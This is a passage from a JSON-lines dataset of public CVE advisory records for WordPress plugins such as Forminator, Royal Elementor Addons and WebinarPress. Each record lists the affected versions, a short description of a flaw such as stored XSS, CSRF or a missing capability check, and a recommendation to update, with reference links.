version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08220b23-d6fa-4005-bbbb-019412d328a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08220b23-d6fa-4005-bbbb-019412d328a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tabs-pro\\\/trunk\\\/theme\\\/tab-shortcode-ultimate-themes.php?rev=2406144#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tabs-pro\\\/trunk\\\/theme\\\/tab-shortcode-ultimate-themes.php?rev=2406144#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982005\\\/tabs-pro#file23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982005\\\/tabs-pro#file23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0469","slug":"forminator","versionImpact":"1.39.2","versionEndExcluding":"1.39.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slider template data in all versions up to, and including, 1.39.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.39.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.39.2\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L888\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.39.2\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L888\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14043276-ba0a-4862-a1a7-00b4c372c5bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14043276-ba0a-4862-a1a7-00b4c372c5bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7052","slug":"forminator","versionImpact":"1.38.2","versionEndExcluding":"1.38.3","description":"The Forminator Forms  WordPress plugin before 1.38.3 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.38.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e52cab5-821c-4ca8-9024-67f716cf78fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e52cab5-821c-4ca8-9024-67f716cf78fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0470","slug":"forminator","versionImpact":"1.38.2","versionEndExcluding":"1.38.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the title parameter in all versions up to, and including, 1.38.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.38.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.38.2\\\/requirejs\\\/main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.38.2\\\/requirejs\\\/main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226716%40forminator%2Ftrunk&old=3222217%40forminator%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226716%40forminator%2Ftrunk&old=3222217%40forminator%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5281d4b-c2cd-4972-b837-e101a8893c6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5281d4b-c2cd-4972-b837-e101a8893c6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9700","slug":"forminator","versionImpact":"1.36.0","versionEndExcluding":"1.36.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.36.0 via the submit_quizzes() function due to missing validation on the 'entry_id' user controlled key. This makes it possible for unauthenticated attackers to modify other user's quiz submissions.","recommendation":"Update to version 1.36.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbed35ca-1630-46a4-8b1f-60cc7216f294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbed35ca-1630-46a4-8b1f-60cc7216f294?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.1\\\/library\\\/modules\\\/quizzes\\\/front\\\/front-action.php#L548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.1\\\/library\\\/modules\\\/quizzes\\\/front\\\/front-action.php#L548\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172942\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9352","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the custom form 'create_module' function. This makes it possible for unauthenticated attackers to create draft forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/custom-forms\\\/admin\\\/admin-loader.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/custom-forms\\\/admin\\\/admin-loader.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9351","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the quiz 'create_module' function. This makes it possible for unauthenticated attackers to create draft quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/quizzes\\\/admin\\\/admin-loader.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/quizzes\\\/admin\\\/admin-loader.php#L719\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10402","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.35.1. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to create new or edit existing forms, including updating the default registration role to Administrator on User Registration forms.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10145","slug":"social-pug","versionImpact":"1.34.3","versionEndExcluding":"1.34.4","description":"The Hubbub Lite  WordPress plugin before 1.34.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.34.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e2381b-3ea0-48fa-bd9c-4181ddf36389\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e2381b-3ea0-48fa-bd9c-4181ddf36389\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1502","slug":"ip2location-redirection","versionImpact":"1.33.3","versionEndExcluding":"1.33.4","description":"The IP2Location Redirection plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'download_ip2location_redirection_backup' AJAX action in all versions up to, and including, 1.33.3. This makes it possible for unauthenticated attackers to download the plugin's settings.","recommendation":"Update to version 1.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244195%40ip2location-redirection&new=3244195%40ip2location-redirection&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244195%40ip2location-redirection&new=3244195%40ip2location-redirection&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca41dd8-5bd3-4fee-9f3f-feb8f1a4c687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca41dd8-5bd3-4fee-9f3f-feb8f1a4c687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11271","slug":"wp-webinarsystem","versionImpact":"1.33.24","versionEndExcluding":"1.33.25","description":"The WordPress Webinar Plugin \u2013 WebinarPress plugin for WordPress is vulnerable to modification of data due to a missing capability check on several functions in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify webinars.","recommendation":"Update to version 1.33.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88508dbd-b7a0-441d-918b-f4cb7a7cd000?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88508dbd-b7a0-441d-918b-f4cb7a7cd000?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11270","slug":"wp-webinarsystem","versionImpact":"1.33.24","versionEndExcluding":"1.33.25","description":"The WordPress Webinar Plugin \u2013 WebinarPress plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the 'sync-import-imgs' function and missing file type validation in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files that can lead to remote code execution.","recommendation":"Update to version 1.33.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c2cb3f-2f9e-40c5-9e5f-5b85a53e5868?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c2cb3f-2f9e-40c5-9e5f-5b85a53e5868?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7154","slug":"social-pug","versionImpact":"1.31.1","versionEndExcluding":"1.32.0","description":"The Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.32.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed423dd-4a38-45e0-8645-3f4215a3f15c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed423dd-4a38-45e0-8645-3f4215a3f15c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1979","slug":"web-stories","versionEndExcluding":"1.32.0","description":"The Web Stories for WordPress plugin supports the WordPress built-in functionality of protecting content with a password. The content is then only accessible to website visitors after entering the password. In WordPress, users with the \"Author\" role can create stories, but don't have the ability to edit password protected stories. The vulnerability allowed users with said role to bypass this permission check when trying to duplicate the protected story in the plugin's own dashboard, giving them access to the seemingly protected content. We recommend upgrading to version 1.32 or beyond commit\u00a0 ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 https:\/\/github.com\/GoogleForCreators\/web-stories-wp\/commit\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 \n","recommendation":"Update to version 1.32.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/commit\\\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68\",\"name\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/commit\\\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/releases\\\/tag\\\/v1.32.0\",\"name\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/releases\\\/tag\\\/v1.32.0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10535","slug":"video-wc-gallery","versionImpact":"1.31","versionEndExcluding":"1.32","description":"The Video Gallery for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the remove_unused_thumbnails() function in all versions up to, and including, 1.31. This makes it possible for unauthenticated attackers to delete thumbnails in the video-wc-gallery-thumb directory.","recommendation":"Update to version 1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50259040-a984-42a8-8d58-cc94e349ca45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50259040-a984-42a8-8d58-cc94e349ca45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-wc-gallery\\\/trunk\\\/admin\\\/admin-ui-setup.php#L545\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-wc-gallery\\\/trunk\\\/admin\\\/admin-ui-setup.php#L545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182174%40video-wc-gallery&new=3182174%40video-wc-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182174%40video-wc-gallery&new=3182174%40video-wc-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4473","slug":"sydney-toolbox","versionImpact":"1.31","versionEndExcluding":"1.32","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"aThemes: Portfolio\" widget in all versions up to, and including, 1.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60f16abd-951b-48a0-a363-0221f7e0957d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60f16abd-951b-48a0-a363-0221f7e0957d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082233\\\/sydney-toolbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082233\\\/sydney-toolbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4036","slug":"simple-blog-card","versionEndExcluding":"1.32","description":"The Simple Blog Card WordPress plugin before 1.32 does not ensure that posts to be displayed via a shortcode are public, allowing any authenticated users, such as subscriber, to retrieve arbitrary post title and their content such as draft, private and password protected ones","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de3e1718-c358-4510-b142-32896ffeb03f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de3e1718-c358-4510-b142-32896ffeb03f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0623","slug":"vk-block-patterns","versionImpact":"1.31.1.1","versionEndExcluding":"1.31.2.0","description":"The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.31.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4036","slug":"sydney-toolbox","versionImpact":"1.30","versionEndExcluding":"1.31","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the style parameter in all versions up to, and including, 1.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6d5275d-43d0-41f6-96c7-e7646eac4534?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6d5275d-43d0-41f6-96c7-e7646eac4534?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-employee.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-employee.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075394%40sydney-toolbox%2Ftrunk&old=3064481%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075394%40sydney-toolbox%2Ftrunk&old=3064481%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4035","slug":"simple-blog-card","versionEndExcluding":"1.31","description":"The Simple Blog Card WordPress plugin before 1.31 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7417","slug":"royal-elementor-addons","versionImpact":"1.3.986","versionEndExcluding":"1.3.987","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.986 via the data_fetch. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract data from password protected posts.","recommendation":"Update to version 1.3.987, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162784\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/classes\\\/modules\\\/wpr-ajax-search.php?old=3141814&old_path=royal-elementor-addons%2Ftags%2F1.3.985%2Fclasses%2Fmodules%2Fwpr-ajax-search.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162784\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/classes\\\/modules\\\/wpr-ajax-search.php?old=3141814&old_path=royal-elementor-addons%2Ftags%2F1.3.985%2Fclasses%2Fmodules%2Fwpr-ajax-search.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.985\\\/classes\\\/modules\\\/wpr-ajax-search.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.985\\\/classes\\\/modules\\\/wpr-ajax-search.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8482","slug":"royal-elementor-addons","versionImpact":"1.3.986","versionEndExcluding":"1.3.987","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.3.982 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.987, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ccece54-18fa-42e4-ba1a-d0879b73d66d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ccece54-18fa-42e4-ba1a-d0879b73d66d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php#L1746\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php#L1746\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php?rev=3162784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php?rev=3162784\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5818","slug":"royal-elementor-addons","versionImpact":"1.3.980","versionEndExcluding":"1.3.981","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored DOM-based Cross-Site Scripting via the plugin's Magazine Grid\/Slider widget in all versions up to, and including, 1.3.980 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.981, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a0150d-a9fa-4cc2-8fe8-a429747a9964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a0150d-a9fa-4cc2-8fe8-a429747a9964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121073\\\/royal-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121073\\\/royal-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
